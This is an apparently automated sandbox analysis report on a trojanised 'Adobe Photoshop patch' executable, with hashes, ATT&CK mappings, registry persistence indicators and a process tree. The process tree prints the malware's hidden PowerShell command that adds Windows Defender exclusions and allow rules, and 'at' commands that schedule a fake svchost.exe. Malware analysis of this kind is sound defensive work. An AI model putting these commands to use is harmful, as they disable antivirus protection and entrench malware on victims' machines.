775122ef3abf839a3c31421ec6ab7e74d95cc91c012deb292c84a460c3651504

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
20/08/2024, 03:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Patch-Activated/Adobe.Photoshop.Patch.v25.exe
Size

9.6MB
MD5

ddb2eec0904acb45670fc57eab315231
SHA1

cf79232e3c36509a7da94ba94c83b80b1fd6d53b
SHA256

425c5c7ff396b3dee215b6b281b6771765300dde45a5c4aecd943cb0fcd76d0a
SHA512

ab14ac795d2fb305388f4ceb9b99d58851f46de277110c216c81053506cced037f636ff454c4f72b5f21f0bd2787b33b032107eb23001e548403166c097da7ad
SSDEEP

196608:zkc1UHQPvwTuOp8wR4/VB2oxoBt0QA/U3WUdzCs8bXHvdWGTkRQv:zkRQsB8wG/VEk2t8XP4vRQv

Score

10^/10

discovery evasion execution persistence upx

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Windows\\explorer.exe, c:\\windows\\system\\explorer.exe"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Windows\\explorer.exe, c:\\windows\\system\\explorer.exe"	svchost.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	svchost.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 8 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	svchost.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	svchost.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	svchost.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999}	svchost.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\mrsys.exe MR"	explorer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2180	powershell.exe
2180	powershell.exe

Executes dropped EXE 12 IoCs

pid	Process
2448	adobe.photoshop.patch.v25.exe
2792	icsys.icn.exe
2908	explorer.exe
2756	spoolsv.exe
2060	svchost.exe
2056	spoolsv.exe
2524	FGHBDX.exe
1936	fghbdx.exe
1816	fghbdx.exe
1184	Process not Found
2420	icsys.icn.exe
1664	explorer.exe

Loads dropped DLL 50 IoCs

pid	Process
2616	Adobe.Photoshop.Patch.v25.exe
2616	Adobe.Photoshop.Patch.v25.exe
2616	Adobe.Photoshop.Patch.v25.exe
2792	icsys.icn.exe
2792	icsys.icn.exe
2792	icsys.icn.exe
2792	icsys.icn.exe
2792	icsys.icn.exe
2908	explorer.exe
2908	explorer.exe
2908	explorer.exe
2908	explorer.exe
2908	explorer.exe
2756	spoolsv.exe
2756	spoolsv.exe
2756	spoolsv.exe
2756	spoolsv.exe
2756	spoolsv.exe
2060	svchost.exe
2060	svchost.exe
2060	svchost.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2060	svchost.exe
2060	svchost.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2056	spoolsv.exe
2056	spoolsv.exe
2056	spoolsv.exe
2524	FGHBDX.exe
2524	FGHBDX.exe
2524	FGHBDX.exe
1936	fghbdx.exe
1816	fghbdx.exe
1816	fghbdx.exe
1816	fghbdx.exe
1816	fghbdx.exe
1816	fghbdx.exe
1816	fghbdx.exe
1816	fghbdx.exe
2524	FGHBDX.exe
2524	FGHBDX.exe
2420	icsys.icn.exe
2420	icsys.icn.exe
2420	icsys.icn.exe
2420	icsys.icn.exe
1664	explorer.exe
1664	explorer.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1816-227-0x000007FEF6C10000-0x000007FEF72D4000-memory.dmp	upx

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\system\\explorer.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\system\\svchost.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\system\\explorer.exe RO"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\system\\svchost.exe RO"	svchost.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0006000000019332-8.dat	autoit_exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\system\explorer.exe	icsys.icn.exe
File opened for modification	\??\c:\windows\system\spoolsv.exe	explorer.exe
File opened for modification	\??\c:\windows\system\svchost.exe	spoolsv.exe
File opened for modification	\??\c:\windows\system\explorer.exe	explorer.exe
File opened for modification	\??\c:\windows\system\svchost.exe	svchost.exe
File opened for modification	C:\Windows\system\udsys.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adobe.photoshop.patch.v25.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icsys.icn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FGHBDX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobe.Photoshop.Patch.v25.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	at.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icsys.icn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2448	adobe.photoshop.patch.v25.exe
2792	icsys.icn.exe
2908	explorer.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2448	adobe.photoshop.patch.v25.exe
2908	explorer.exe
2908	explorer.exe
2060	svchost.exe
2060	svchost.exe
2908	explorer.exe
2060	svchost.exe
2060	svchost.exe
2908	explorer.exe
2908	explorer.exe
2060	svchost.exe
2060	svchost.exe
2908	explorer.exe
2908	explorer.exe
2060	svchost.exe
2060	svchost.exe
2908	explorer.exe
2908	explorer.exe
2060	svchost.exe
2060	svchost.exe
2908	explorer.exe
2908	explorer.exe
2060	svchost.exe
2060	svchost.exe
2908	explorer.exe
2908	explorer.exe
2060	svchost.exe
2060	svchost.exe
2908	explorer.exe
2908	explorer.exe
2060	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
2060	svchost.exe
2908	explorer.exe
1816	fghbdx.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeRestorePrivilege	2792	icsys.icn.exe
Token: SeBackupPrivilege	2792	icsys.icn.exe
Token: SeRestorePrivilege	2616	Adobe.Photoshop.Patch.v25.exe
Token: SeBackupPrivilege	2616	Adobe.Photoshop.Patch.v25.exe
Token: SeDebugPrivilege	2180	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1816	fghbdx.exe

Suspicious use of SetWindowsHookEx 20 IoCs

pid	Process
2616	Adobe.Photoshop.Patch.v25.exe
2616	Adobe.Photoshop.Patch.v25.exe
2792	icsys.icn.exe
2792	icsys.icn.exe
2908	explorer.exe
2908	explorer.exe
2756	spoolsv.exe
2756	spoolsv.exe
2060	svchost.exe
2060	svchost.exe
2056	spoolsv.exe
2056	spoolsv.exe
2908	explorer.exe
2908	explorer.exe
2524	FGHBDX.exe
2524	FGHBDX.exe
2420	icsys.icn.exe
2420	icsys.icn.exe
1664	explorer.exe
1664	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2616 wrote to memory of 2448	2616	Adobe.Photoshop.Patch.v25.exe	29
PID 2616 wrote to memory of 2448	2616	Adobe.Photoshop.Patch.v25.exe	29
PID 2616 wrote to memory of 2448	2616	Adobe.Photoshop.Patch.v25.exe	29
PID 2616 wrote to memory of 2448	2616	Adobe.Photoshop.Patch.v25.exe	29
PID 2616 wrote to memory of 2448	2616	Adobe.Photoshop.Patch.v25.exe	29
PID 2616 wrote to memory of 2448	2616	Adobe.Photoshop.Patch.v25.exe	29
PID 2616 wrote to memory of 2448	2616	Adobe.Photoshop.Patch.v25.exe	29
PID 2616 wrote to memory of 2792	2616	Adobe.Photoshop.Patch.v25.exe	30
PID 2616 wrote to memory of 2792	2616	Adobe.Photoshop.Patch.v25.exe	30
PID 2616 wrote to memory of 2792	2616	Adobe.Photoshop.Patch.v25.exe	30
PID 2616 wrote to memory of 2792	2616	Adobe.Photoshop.Patch.v25.exe	30
PID 2616 wrote to memory of 2792	2616	Adobe.Photoshop.Patch.v25.exe	30
PID 2616 wrote to memory of 2792	2616	Adobe.Photoshop.Patch.v25.exe	30
PID 2616 wrote to memory of 2792	2616	Adobe.Photoshop.Patch.v25.exe	30
PID 2792 wrote to memory of 2908	2792	icsys.icn.exe	31
PID 2792 wrote to memory of 2908	2792	icsys.icn.exe	31
PID 2792 wrote to memory of 2908	2792	icsys.icn.exe	31
PID 2792 wrote to memory of 2908	2792	icsys.icn.exe	31
PID 2792 wrote to memory of 2908	2792	icsys.icn.exe	31
PID 2792 wrote to memory of 2908	2792	icsys.icn.exe	31
PID 2792 wrote to memory of 2908	2792	icsys.icn.exe	31
PID 2908 wrote to memory of 2756	2908	explorer.exe	32
PID 2908 wrote to memory of 2756	2908	explorer.exe	32
PID 2908 wrote to memory of 2756	2908	explorer.exe	32
PID 2908 wrote to memory of 2756	2908	explorer.exe	32
PID 2908 wrote to memory of 2756	2908	explorer.exe	32
PID 2908 wrote to memory of 2756	2908	explorer.exe	32
PID 2908 wrote to memory of 2756	2908	explorer.exe	32
PID 2756 wrote to memory of 2060	2756	spoolsv.exe	33
PID 2756 wrote to memory of 2060	2756	spoolsv.exe	33
PID 2756 wrote to memory of 2060	2756	spoolsv.exe	33
PID 2756 wrote to memory of 2060	2756	spoolsv.exe	33
PID 2756 wrote to memory of 2060	2756	spoolsv.exe	33
PID 2756 wrote to memory of 2060	2756	spoolsv.exe	33
PID 2756 wrote to memory of 2060	2756	spoolsv.exe	33
PID 2448 wrote to memory of 2524	2448	adobe.photoshop.patch.v25.exe	34
PID 2448 wrote to memory of 2524	2448	adobe.photoshop.patch.v25.exe	34
PID 2448 wrote to memory of 2524	2448	adobe.photoshop.patch.v25.exe	34
PID 2448 wrote to memory of 2524	2448	adobe.photoshop.patch.v25.exe	34
PID 2448 wrote to memory of 2524	2448	adobe.photoshop.patch.v25.exe	34
PID 2448 wrote to memory of 2524	2448	adobe.photoshop.patch.v25.exe	34
PID 2448 wrote to memory of 2524	2448	adobe.photoshop.patch.v25.exe	34
PID 2060 wrote to memory of 2056	2060	svchost.exe	35
PID 2060 wrote to memory of 2056	2060	svchost.exe	35
PID 2060 wrote to memory of 2056	2060	svchost.exe	35
PID 2060 wrote to memory of 2056	2060	svchost.exe	35
PID 2060 wrote to memory of 2056	2060	svchost.exe	35
PID 2060 wrote to memory of 2056	2060	svchost.exe	35
PID 2060 wrote to memory of 2056	2060	svchost.exe	35
PID 2448 wrote to memory of 3000	2448	adobe.photoshop.patch.v25.exe	36
PID 2448 wrote to memory of 3000	2448	adobe.photoshop.patch.v25.exe	36
PID 2448 wrote to memory of 3000	2448	adobe.photoshop.patch.v25.exe	36
PID 2448 wrote to memory of 3000	2448	adobe.photoshop.patch.v25.exe	36
PID 2448 wrote to memory of 3000	2448	adobe.photoshop.patch.v25.exe	36
PID 2448 wrote to memory of 3000	2448	adobe.photoshop.patch.v25.exe	36
PID 2448 wrote to memory of 3000	2448	adobe.photoshop.patch.v25.exe	36
PID 2060 wrote to memory of 452	2060	svchost.exe	38
PID 2060 wrote to memory of 452	2060	svchost.exe	38
PID 2060 wrote to memory of 452	2060	svchost.exe	38
PID 2060 wrote to memory of 452	2060	svchost.exe	38
PID 2060 wrote to memory of 452	2060	svchost.exe	38
PID 2060 wrote to memory of 452	2060	svchost.exe	38
PID 2060 wrote to memory of 452	2060	svchost.exe	38
PID 3000 wrote to memory of 1464	3000	cmd.exe	40

C:\Users\Admin\AppData\Local\Temp\Patch-Activated\Adobe.Photoshop.Patch.v25.exe
"C:\Users\Admin\AppData\Local\Temp\Patch-Activated\Adobe.Photoshop.Patch.v25.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2616
- \??\c:\users\admin\appdata\local\temp\patch-activated\adobe.photoshop.patch.v25.exe
  c:\users\admin\appdata\local\temp\patch-activated\adobe.photoshop.patch.v25.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2448
- - C:\Users\Admin\AppData\Local\Temp\FGHBDX.exe
    "C:\Users\Admin\AppData\Local\Temp\FGHBDX.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2524
  - - \??\c:\users\admin\appdata\local\temp\fghbdx.exe
      c:\users\admin\appdata\local\temp\fghbdx.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1936
    - - \??\c:\users\admin\appdata\local\temp\fghbdx.exe
        
        c:\users\admin\appdata\local\temp\fghbdx.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of FindShellTrayWindow
        
        PID:1816
  - - C:\Users\Admin\AppData\Local\icsys.icn.exe
      C:\Users\Admin\AppData\Local\icsys.icn.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2420
    - - \??\c:\windows\system\explorer.exe
        
        c:\windows\system\explorer.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\HCQRWQ.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3000
  - - C:\Windows\SysWOW64\reg.exe
      reg query "HKU\S-1-5-19\Environment"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1464
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Powershell -nologo -noninteractive -windowStyle hidden -noprofile -command $First = "Add-MpPreference -ThreatIDDefaultAction_Ids "; $Third = " -ThreatIDDefaultAction_Actions Allow -Force"; $ListID = 2147685180, 2147735507, 2147736914, 2147743522, 2147734094, 2147743421, 251873, 213927, 2147722906, 2147748160; ForEach ($ID in $ListID) { Invoke-Expression ($First + $ID + $Third) }; $ListPath = "C:\Windows\KMSAutoS", "C:\Windows\System32\SppExtComObjHook.dll", "C:\Windows\System32\SppExtComObjPatcher.exe", "C:\Windows\AAct_Tools", "C:\Windows\AAct_Tools\AAct_x64.exe", "C:\Windows\AAct_Tools\AAct_files\KMSSS.exe", "C:\Windows\AAct_Tools\AAct_files", "C:\Windows\KMS"; $First = "Add-MpPreference -ExclusionPath "; $Third = "-Force"; ForEach ($Path in $ListPath) { Invoke-Expression ($First + $Path + $Third) }; :Admin
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2180
  - - C:\Windows\SysWOW64\reg.exe
      reg query "HKU\S-1-5-19\Environment"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1352
- C:\Users\Admin\AppData\Local\icsys.icn.exe
  C:\Users\Admin\AppData\Local\icsys.icn.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2792
- - \??\c:\windows\system\explorer.exe
    c:\windows\system\explorer.exe
    3⤵
    - Modifies WinLogon for persistence
    - Modifies visiblity of hidden/system files in Explorer
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - \??\c:\windows\system\spoolsv.exe
      c:\windows\system\spoolsv.exe SE
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2756
    - - \??\c:\windows\system\svchost.exe
        
        c:\windows\system\svchost.exe
        5⤵
        Modifies WinLogon for persistence
        Modifies visiblity of hidden/system files in Explorer
        Boot or Logon Autostart Execution: Active Setup
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2060
      - \??\c:\windows\system\spoolsv.exe
        
        c:\windows\system\spoolsv.exe PR
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2056
      - C:\Windows\SysWOW64\at.exe
        
        at 03:22 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:452
      - C:\Windows\SysWOW64\at.exe
        
        at 03:23 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1636
      - C:\Windows\SysWOW64\at.exe
        
        at 03:24 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\HCQRWQ.cmd

Filesize
1KB

MD5
15a1fe3d0f342bdd3232253c7810a05d

SHA1
b658e0d903b37bf12e8e640bece22f235552dc50

SHA256
4070dcb09b69ef57160fae0be5ee3664e39170eeacc46e6f50a080493552b338

SHA512
1961fc65a839c55806162a197385859cfe3a24551ab9b7e0121166eac5e5ae1a4a0d9180229d0ea0240dccb770e4c2d508577e60988c9271bb11f94de1897a35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19362\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19362\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
517eb9e2cb671ae49f99173d7f7ce43f

SHA1
4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

SHA256
57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

SHA512
492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19362\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
d12403ee11359259ba2b0706e5e5111c

SHA1
03cc7827a30fd1dee38665c0cc993b4b533ac138

SHA256
f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

SHA512
9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19362\ucrtbase.dll

Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
C:\Users\Admin\AppData\Local\icsys.icn.exe

Filesize
206KB

MD5
5b8cd23898cb755bef88cd2ac3dcc1d3

SHA1
c6f1350a5edb1f6e6309007e09394e75e50e282e

SHA256
5d80d3425a19a396aac0cf28268963136ba3a4f5cf7ad3e143eccf458226f4cc

SHA512
93fc655ec7537b2b8acbc1bb27d539d61023ebe883e95408975c4bb311c81a2272da4eefc04a2df57a9db8ab895119355f90e969c8db5976730f8801cba0da8e

Download Submit
C:\Users\Admin\AppData\Roaming\mrsys.exe

Filesize
206KB

MD5
163eb65bd79b83347eeac45d053a0802

SHA1
5d7496173288ea624aa4059aa801fd750b310f1d

SHA256
4177364c4f33e2c5a2ce0b2139a1412e07714db22bcebd64093ce8b9ade106d9

SHA512
7479dabae6b6d095af16917dce3ef186dee10ce861c4a114102815ecef74088f0160db01158e552bbe86150594d588191ce3a0d2e0bcad13253979e6c8d6a55c

Download Submit
\Users\Admin\AppData\Local\Temp\FGHBDX.exe

Filesize
8.4MB

MD5
fae8d6dc08a084405c3e0c8bcc0af5fa

SHA1
da74ddb7fc17ccc8416959a032bb6cc071c85a4a

SHA256
53953e7cc213dfe2322a1c27cec3a3331399838a9605ca9272775df0dff9c6b2

SHA512
ee4606314a9ea64502ad558238e21bbbef9d67eb1c5f5f28c50650a62f21f36d5beb28bfd0022ab724094ca09797530e0c1a68b236212e653ae39bcb64d96291

Download Submit
\Users\Admin\AppData\Local\Temp\Patch-Activated\adobe.photoshop.patch.v25.exe

Filesize
9.4MB

MD5
62450c3a11072548a932f05edaff4608

SHA1
520d66028b237a95c62cb9cc1b17e32106ee6925

SHA256
23b50425969b3107ce1afd8d7f2279d1437a56d3b49df61c170e6f60849d3827

SHA512
454c4e58ebc19444201197ee7d68600ff0ccbea6dd1ec6e6d6aaa1b01310beffcf643f30d220510fdd42bca4788f8614906fba59965ee96af8d7752f729721bd

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI19362\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
1c58526d681efe507deb8f1935c75487

SHA1
0e6d328faf3563f2aae029bc5f2272fb7a742672

SHA256
ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

SHA512
8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI19362\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
724223109e49cb01d61d63a8be926b8f

SHA1
072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

SHA256
4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

SHA512
19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

Download Submit
